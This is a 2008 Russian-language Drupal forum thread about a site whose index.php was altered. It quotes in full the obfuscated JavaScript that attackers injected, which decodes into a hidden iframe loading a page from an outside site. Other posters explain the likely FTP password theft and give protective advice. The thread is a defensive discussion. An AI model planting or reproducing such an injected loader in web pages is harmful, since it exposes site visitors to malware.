Замеченно странное дело с файлом index.php

Главные вкладки

Аватар пользователя enjoy enjoy 24 июля 2008 в 9:42

Сегодня с утра зашел на сайт и увидел такое:

Parse error: syntax error, unexpected '<' in /home/*/*/*/index.php on line 37

Полез в код index.php, в итоге

в строке 37 обнаружил следующий код:

drupal_page_footer();<!-- o --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109100114101097109046110101116047';
s=s+'103112051047105110100101120046112104112034032119105100116104061051032104101105103104116061051032115';
s=s+'116121108101061034100105115112108097121058110111110101034062060047073070082065077069062032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c -->

в оригинальном файле код был другой

Что за скрипт такой, файл был изменен сегодняшним числом...причем я ничего не трогал и на фтп не заходил.
Я в расстерянности.

Комментарии

Аватар пользователя Valeratal Valeratal 24 июля 2008 в 10:11

Это вирус, на компе,
скорее всего пароли забиты в тотал коммандер - оттуда их ворует вирус

меняйте пароли, шерстите все файлы с текстом *index* (даже html), куда есть доступ с тотал-коммандера (с забитыми в него паролями)
вычищайете эти яваскрипты, проверяйте каталоги на новые (обновленные) файлы-
В том же коммандаре можно отсортировать по дате

И не храните пароли в коммандаре, забивайте руками при фтп-соединенни

P.S. Сам так попал, замучился vbulletin очищать (там в каждой папке по index.php, нашел также не мой файл)

Аватар пользователя Valeratal Valeratal 24 июля 2008 в 10:17

в CuteFTP - не знаю, там как то вроде возможно шифровать
но не уверен, что это по умолчанию
Но то что пароли ушли - это точно
меняйте пароли и пока не разберетесь, храните в текстовом файле

Аватар пользователя leramulina leramulina 24 июля 2008 в 13:06

не хранить пароли в тотал коммандере
обновлять антивирусник

у меня была такая же проблема. а чуть с ума не сошла.
хорошо в рбк-хостинг был архив сайта с базой. они его откуда-то достали и все заново переставили.

Аватар пользователя bodro bodro 24 июля 2008 в 13:24

тотал не тотал...

в момент коннекта пароли передаются в НЕ зашифрованном виде
как выход поставить тотал, потом перенисти его файлы в другую не дефолтную папку, если вирус не будет знать где тотал то и пароль не сможет забрать, но если вирус будет снифить трафик то в момент коннекта по фтп (любой прогой) он сможет забрать пароль

мораль: переносить файлы тотала, юзать антивиръ и фаерволъ

Аватар пользователя enjoy enjoy 24 июля 2008 в 18:58

вирус однозначно

принцип примерно таковой:

1. Мой девственный компутер, через IE скушал с зараженного таким образом сайта (неизвестно какого) троян по именем Downloader.JS* (существуют вариации).
2. Он в свою очередь незамедлительно начал свою работу по сбору паролей фтп.
3. Далее не знаю, может их он складывал в удаленную базу.
4. Потом с помощью паролей и скрипта на сервере удаленном в конец файлов index.* добавлялись такие строки.

В общем не я первый, и вирус старый. Вопрос в том, почему его антивирусы не ловят.

Аватар пользователя axel axel 25 июля 2008 в 19:12

Если на хостинге есть возможность, не пользоваться FTP, а пользоваться SSH/SFTP.

Плюс друпальских правил оформления исходного кода - нет закрывающей ?> в конце PHP-скриптов, поэтому тупые яваскриптовые вирусы рушат программу и вызывают ошибку на сайте. По-моему это лучше, чем сайт с вирусом на главной странице.

Аватар пользователя vasyapupkin1 vasyapupkin1 25 июля 2008 в 23:37

Я вообще ftp отключил у себя на сервере. Есть ssh (sftp) и есть файл-манагер панели (ISPManager) - этого должно хватить.
А антивирусники... Ну да, раз или два в неделю мои виндузерные админы-коллеги чистят минимум 1 комп от всяких ntos`ов и прочей фигни. Причём антивирь стоит лучший по результатам корпоративного тестирования (Symantec Corporate Edition)

Аватар пользователя kiev1 kiev1 26 июля 2008 в 22:01

не пользоваться микрософтами - вирусы в них были с начала и на сегодня благодаря им мы имеем проблему спама из зомби-сетей на взломанных виндовсах, дос-атаки и взломы сайтов через украденные ftp пароли - очевидно что дальше будет только хуже